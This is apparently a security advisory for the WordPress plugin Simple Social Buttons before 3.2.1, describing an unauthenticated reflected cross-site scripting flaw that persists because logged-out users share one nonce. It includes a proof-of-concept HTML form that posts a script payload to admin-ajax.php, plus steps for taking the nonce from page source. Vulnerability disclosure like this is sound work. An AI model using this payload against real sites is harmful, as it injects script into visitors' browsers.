Simple Social Buttons < 3.2.1 - Unauthenticated Reflected Cross-Site Scripting
Description
The version 3.2.0 attempted to fix a reflected Cross-Site Scripting issue, by adding a CSRF check, which does not fully remediate it as unauthenticated users will all have the same nonce generated (and valid for 12h to 24h, or 2 WP ticks). Only unauthenticated users can be attacked with this issue. The plugin also added further sanitisation in other areas in 3.2.1.
Proof of Concept
As an unauthenticated user, go to a page where the Facebook share is active, view the source to get the fb_share_nonce.
Replace the value of the security parameter below by the nonce retreived, as well as the URL of the domain, open the file with a web browser and click on Submit.
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="ssb_facebook_shares_update" />
<input type="hidden" name="security" value="[NONCE]" />
<input type="hidden" name="share_counts" value='<script>alert(/XSS/)</script>' />
<input type="hidden" name="post_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Affects Plugins
Fixed in version 3.2.1✓
References
Classification
Miscellaneous
Verified
Yes
Timeline
Publicly Published
2020-12-18 (about 9 months ago)
Added
2020-12-18 (about 9 months ago)
Last Updated
2020-12-18 (about 9 months ago)